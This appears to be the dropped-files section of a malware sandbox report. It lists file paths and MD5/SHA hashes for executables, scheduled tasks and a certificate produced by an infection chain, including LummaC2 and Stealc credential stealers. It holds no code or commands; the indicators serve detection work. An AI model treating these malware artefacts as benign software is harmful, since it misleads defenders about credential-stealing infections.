| MD5 | 6e2ecc4230c37a6eeb1495257d6d3153 |
| SHA1 | 50c5d4e2e71a39e852ab09a2857ac1cb5f882803 |
| SHA256 | f5184103aaacf8c9a7b780ccf7729be92cb813b3b61f4d1a9394352050ae86a2 |
| SHA512 | 849f39d00cdb3c1481adfe7a2b1745ba97cf02e6e45b471ec1e3292ef92130e2319455702c71f5c531926d008dd2e9dfbfe9d66e1c81406bc9532eb4bf1febd6 |
C:\Users\Admin\Desktop\Files\whiteheroin.exe
| MD5 | ca0a3f23c4743c84b5978306a4491f6f |
| SHA1 | 58cf2b0555271badc3802e658569031666cb7d7e |
| SHA256 | 944113e85a7cf29d41fbbb30f87ea2554d036448a0bdb1e4e2b2ade3f99a9359 |
| SHA512 | 9767f2afbe92eddc46a5654f7f8d6eb10da305df5b009d7407ba9822e5d0f9cc374728900e5ebed15e9849f155a77f44d96f16b4bcca650a42257bdca7f29cbd |
C:\Users\Admin\AppData\Local\Temp\emgUhHdp.exe
| MD5 | 35c9bc696a96979cbcc57213d8fb8a51 |
| SHA1 | 2acc26416bfcfaf2f7037c211f7dcd35d7a06ac1 |
| SHA256 | a99e6d312c944090d229e7198f05f1cf7a38e37f203646c8aa00c6d77c1359a5 |
| SHA512 | c620f408a3f1af9ff0ae20680c1e56d21634e6cfbc9e4dc3bd69b9868bf2c03516f620bcf5de9e8883bfd0f1795622df3f2e3bce643c4fd54ed20f69ce93c534 |
C:\Program Files (x86)\MountTaiSoftware\Lodop\CAOSOFT_WEB_PRINT_lodop.ocx
| MD5 | 230c8f87850fd67b6b3024da50f360bb |
| SHA1 | f3a629ece2b85aee9a88b3caebc54ac66053330a |
| SHA256 | 3b30b5a1a4561ce2ef9b7fd0f2aa97e533f35c2bdbdb534995cc44066ae0f90a |
| SHA512 | 5dfdedebe4a0e3843d68a3d93a44e54979f8a637902f499c278b5bb91c3a61561f3ed5de510c54405dd4f093128b9b69e175f6b63f9be2b000bbe381f6a2c3eb |
C:\Users\Admin\Desktop\Files\LummaC2.exe
| MD5 | 9b3eef2c222e08a30baefa06c4705ffc |
| SHA1 | 82847ce7892290e76be45b09aa309b27a9376e54 |
| SHA256 | 8903d4bfe61ca3ca897af368619fe98a7d0ee81495df032b9380f00af41bbfc7 |
| SHA512 | 5c72c37144b85b0a07077243ffe21907be315e90ba6c268fdb10597f1e3293e52a753dccbfd48578871a032898677c918fa71dc02d6861e05f98f5e718189b73 |
C:\Users\Admin\Desktop\Files\Sniffthem.exe
| MD5 | 18ba97473a5ff4ecd0d25aee1ac36ddd |
| SHA1 | 9b9dad90f6dcd55c6d20857649ce5279c6a9b8d7 |
| SHA256 | feefce2d619431c33f6e7167eb467df24ee45b45a8b7c8f804cdf0aa1a04b732 |
| SHA512 | 0601b17d4b715ba4def5811f94ceeecc62542a9ce53ccef548313e69499cf34f80c8c231d3dd56c71adb05bfcccede58e4d8f76838cd1b2095003bd804ab7c77 |
C:\Users\Admin\AppData\Local\Temp\DCF6.tmp.x.exe
| MD5 | 97eb7baa28471ec31e5373fcd7b8c880 |
| SHA1 | 397efcd2fae0589e9e29fc2153ffb18a86a9b709 |
| SHA256 | 9053b6bbaf941a840a7af09753889873e51f9b15507990979537b6c982d618cb |
| SHA512 | 323389357a9ffc5e96f5d6ef78ceb2ec5c62e4dcc1e868524b4188aff2497810ad16de84e498a3e49640ad0d58eadf2ba9c6ec24e512aa64d319331f003d7ced |
C:\Users\Admin\AppData\Local\Temp\EE7C.tmp.zx.exe
| MD5 | 4edcaedbf0e3ea4480e56d161f595e8c |
| SHA1 | e46818f6e463d5c7d05e900470d4565c482ca8e2 |
| SHA256 | f3e87137e58e1f3878ed311b719fe1e4d539a91327a800baf9640543e13a8425 |
| SHA512 | 3ab0c1d41a24cd7be17623acbdae3dd2f0d0fd7838e6cb41fe7427bca6a508157e783b3d8c9717faa18f6341431226719ee90fa5778626ce006f48871b565227 |
C:\Users\Admin\Desktop\Files\Installeraus.exe
| MD5 | 749bd6bf56a6d0ad6a8a4e5712377555 |
| SHA1 | 6e4ff640a527ed497505c402d1e7bdb26f3dd472 |
| SHA256 | e6148c7e8cec3a4565e97a139d2b09dbdf2f30460054fa168624fdc1050421d3 |
| SHA512 | 250f1825f5d2577124606818a8c370bb862d74dfebddd8c25ec2b43448626b583e166e101f65ebe12b66b8767af7ad75a8d9f5a3afd4e10f4dd3e6239efe9a7d |
C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\D98BA7C4C88AEA74FEAE9B7A877829F5181B34E3
| MD5 | 6d9557c4e7bf002381c55a864cb3ae90 |
| SHA1 | d6c87181074a784da8aeff193e2145904ecabdc9 |
| SHA256 | 919d8c336ab31d6bd2d6f97ee091ea6c63e4d4e114371fe2c186a24c09078d83 |
| SHA512 | f0887b205ced2881dc662c1962bec986870acdf468ab4de5659949a1df4a35b73cc46a2e793b7865e69d59760a0330ceab0cd03445647643df5df68e93a183ae |
C:\Users\Admin\Desktop\Files\scheduledllama.exe
| MD5 | 46aa8f5fe3d5af96f0a970a8f4df625d |
| SHA1 | 0b4395edb19d330ad6dc285767b4f5a4a7a16c05 |
| SHA256 | b2a54962c45f5dbd7af447a5ab4cf8cea752f8c667d4dc504e1834da94ac4514 |
| SHA512 | e6b1ded614f634e68b17a1ecd4f75538703f0b8603913b2abd30d0d98331f84c3f2b38b8cfe19615d7e5bfe645837bee8a4f604f54bb95ac8c98c830ab7fe47f |
C:\Users\Admin\Desktop\Files\DEF.exe
| MD5 | 6520492a4e7f9bc4dfb068de1c7b6450 |
| SHA1 | b5c2086a01528386482826ad243c2711e04200fb |
| SHA256 | 94465e214c05a6b477f6310957448e7d891ce37c960e36d246294eb6843081aa |
| SHA512 | dd8d2d9a22ff521496a908f7dd5de7e25c4d7fd0a56d917a0ba29a5d160a293890f5c397e1ae7bb8a7488d4795221f819d810826b5d533ad1d61e63c438b2565 |
C:\Users\Admin\AppData\Local\Temp\YpnA358o.exe
| MD5 | 76c4a898a39a60bd25a44c0331c59d8c |
| SHA1 | 9c880760278b94057cf0695d9d1a1fb38477d2b2 |
| SHA256 | 6391a145a77cbfcdc9828825aedc6d98725580a160d757e36939cb3399d8390e |
| SHA512 | 16a74a4b1149b91c2b4377c7ba26562cd98f0b019282de978161f28fa956e80c5776904811d9dc798d8a088a34678af823518cc270eaaab436d3c14855814d9b |
C:\Users\Admin\Desktop\Files\octus.exe
| MD5 | c3927a5d6de0e669f49d3d0477abd174 |
| SHA1 | 40e21ae54cb5bbb04f5130ff0c59d3864b082763 |
| SHA256 | f430f588aad57246c8b1cd536bc9ae050a4868b05c5dfaa9b5c555f4593a4b33 |
| SHA512 | 20fe73aa1e20270f8040e46a19413d5af8cb47efcf8caef4075e2824268cdca8d775264c9c75a734c94c28c51983ebd27695dcad1f353ec338bd12e368aaa04d |
C:\Windows\System32\Tasks\axplong
| MD5 | 7384e797a6d2369e4bc36d05df9eee25 |
| SHA1 | c3729ed830c8a68315dacaff8bddb1ce1f8775fe |
| SHA256 | 8ddb5a622431e3a7c1671d705c20aaa3dd04e7c4c51aad714f5990f708828132 |
| SHA512 | 3397203cb83e509289813bbb6942ee8e53ac65169c679c6c19a1d44d4ca18ac97ecb46d1f3c6763e30a5570dfeff398bb34d4909fea46fe9f4debe6fb3eb15d7 |
C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
| MD5 | 68a99cf42959dc6406af26e91d39f523 |
| SHA1 | f11db933a83400136dc992820f485e0b73f1b933 |
| SHA256 | c200ddb7b54f8fa4e3acb6671f5fa0a13d54bd41b978d13e336f0497f46244f3 |
| SHA512 | 7342073378d188912b3e7c6be498055ddf48f04c8def8e87c630c69294bcfd0802280babe8f86b88eaed40e983bcf054e527f457bb941c584b6ea54ad0f0aa75 |
C:\Users\Admin\AppData\Local\Temp\1001527001\aqbjn3fl.exe
| MD5 | 34a152eb5d1d3e63dafef23579042933 |
| SHA1 | 9e1c23718d5b30c13d0cec51ba3484ddc32a3184 |
| SHA256 | 42365467efe5746a0b0076a3e609219a9cffe827d5a95f4e10221f081a3bf8fa |
| SHA512 | 270298ca39c3ff0ab4c576374a5c091135efad3c1cb9930888a74ef7d421f43039c2545eadecb037fcff2b8ee4e22cd4d809b19e7958b44ba1c72100135a46fe |
C:\Users\Admin\AppData\Local\Temp\1002824001\9f346cc402.exe
| MD5 | 6a3268db51b26c41418351e516bc33a6 |
| SHA1 | 57a12903fff8cd7ea5aa3a2d2308c910ac455428 |
| SHA256 | eaebfc5e60378bbc47a603ca1310440c290a396cb2446de36ff6e7afb624ee0c |
| SHA512 | 43f257dbb7e444355e29a8023e8c8838c9e0ca7538a86c25ac41db1e0308bf73c3adda1b0fe5d0bcf536387b9ce5f8fed216f5f7d92c80bcc12e7bffde979b33 |
C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
| MD5 | c07e06e76de584bcddd59073a4161dbb |
| SHA1 | 08954ac6f6cf51fd5d9d034060a9ae25a8448971 |
| SHA256 | cf67a50598ee170e0d8596f4e22f79cf70e1283b013c3e33e36094e1905ba8d9 |
| SHA512 | e92c9fcd0448591738daedb19e8225ff05da588b48d1f15479ec8af62acd3ea52b5d4ba3e3b0675c2aa1705185f5523dcafdf14137c6e2984588069a2e05309f |
C:\Windows\System32\Tasks\Gxtuum
| MD5 | 267ea52710bf7b967429c3f0df8092c5 |
| SHA1 | 8274293c7e1a858f1c512bb0980112c0c1eb7473 |
| SHA256 | 22d4d275c3b7a5f4006e88c1bacf97a70f537f8fc9157e1c1c77564721b5bea4 |
| SHA512 | 284dac772e1d6e9276b514b88b57ae30cababfbe96fdefcf041661493e2d8356de3d2211c5b4650c9fc2d491cac38830df231e47918258593ef6c0b65a170954 |
C:\ProgramData\mozglue.dll
| MD5 | c8fd9be83bc728cc04beffafc2907fe9 |
| SHA1 | 95ab9f701e0024cedfbd312bcfe4e726744c4f2e |
| SHA256 | ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a |
| SHA512 | fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040 |
C:\Users\Admin\AppData\Local\Temp\1003374001\kxfh9qhs.exe
| MD5 | b3834900eea7e3c2bae3ab65bb78664a |
| SHA1 | cf5665241bc0ea70d7856ea75b812619cb31fb94 |
| SHA256 | cc35b0641c3c85446892311031369a42990c019c7b143b875be5c683e83ff3ce |
| SHA512 | ae36ab053e692434b9307a21dcebe6499b60a3d0bca8549d7264b4756565cb44e190aa9396aea087609adaeb1443f098da1787fd8ffe2458c4fa1c5faea15909 |
C:\Users\Admin\AppData\Local\Temp\10000270101\Javvvum.exe
| MD5 | aed024049f525c8ae6671ebdd7001c30 |
| SHA1 | fadd86e0ce140dc18f33193564d0355b02ee9b05 |
| SHA256 | 9c45c5456167f65156faa1313ad8bbaffb8aa375669bf756fe0273580a621494 |
| SHA512 | ec0846be717d200639c529a4ac14f47f6b466fa2c8231049bc474183b285c7d8ce3200ff9f9c813171de8b7eb15c63f229b4748c751a167d7eff3489249738d2 |
C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
| MD5 | 7b5e89271f2f7e9a42d00cd1f1283d0f |
| SHA1 | 8e2a8d2f63713f0499d0df70e61db3ce0ff88b4f |
| SHA256 | fd51fd3388f72dd5eef367bd8848a9e92ae1b218be128e9e75dffdf39ed9438a |
| SHA512 | 3779e92bd1d68644ceb2ef327c7d24667e13d8c927df3f77ec3b542278538b424ea2fa58a7c03554f7bec245e0ba7702853d8d520c528745dafd67653234ab22 |
C:\Users\Admin\AppData\Local\Temp\1004437001\d36f264390.exe
| MD5 | 17d580563cbdd3a37f8ef159c70f0b8e |
| SHA1 | b0532976bd695b39384aa81d89b54fbde900b778 |
| SHA256 | 9bba12864f0e8b64600e4252b589fd4f1f0b0339ecde4bc1c130a0d96945ffa7 |
| SHA512 | 784fff522205ce44534474cdb26c7b456aeb6e2c42e4de96b3d5f6b4a36a0d329cf05a847f0a292979aaa09935fc9445390063faca4f0f492ee61ade0540f775 |
C:\Users\Admin\AppData\Local\Temp\1004438001\d30e0af131.exe
| MD5 | 95a269acc2667e85ec3c67f5f76e0fe5 |
| SHA1 | 85b4c01a1f5a65cfe084165bbba00493a74b6a1a |
| SHA256 | d8bf15f010a88817bfff05c7df61fba23676d5fe4d3a8deb5073fc7fa5255a3c |
| SHA512 | be24721f2eec1b3240837a1d42030d58de00cbcd66d6db183a11d3f00e2829859b4813b1a6bcdffcba0c7352975618df95212e723d0bb65a0c360dd8fd1a20dd |
C:\Users\Admin\AppData\Local\Temp\is-G3R38.tmp\_isetup\_shfoldr.dll
| MD5 | 92dc6ef532fbb4a5c3201469a5b5eb63 |
| SHA1 | 3e89ff837147c16b4e41c30d6c796374e0b8e62c |
| SHA256 | 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87 |
| SHA512 | 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3 |
C:\Users\Admin\AppData\Roaming\Isk1MjbS0E.exe
| MD5 | fd381b2627904d8365229d1ddd7e221f |
| SHA1 | d7bcbabb6cd84875cc76f8170833ac679cd7d915 |
| SHA256 | ed5ac0c0d07595eb99ccc7346faab8504eb03000da1012abc1009c0cfbd4d4b9 |
| SHA512 | 2b1e15b539d55b92f31c61cff954dafa61a44f7ccf75d113ab57ad54e9a8cbde304a285d0583663a206f648fd4f3b63257dbedf3df608d0391353ffb4aa78daf |
C:\Users\Admin\AppData\Roaming\W70OVXGD7k.exe
| MD5 | 131d164783db3608e4b2e97428e17028 |
| SHA1 | c00064a0f4952f5a37093cd7631f5921f9c00387 |
| SHA256 | 05053f2a6db0f5352295ce4ca7146618ddb175f1ff4cdcd93a055a039c098e5f |
| SHA512 | 020b22527d0e555509897ce2df876bf2a30e3fc976cd86e52335104cf0f9db152caa8b46650a8bd0022b3cbaf3d20e0201322e3617e00eb0f25c6fcba245c505 |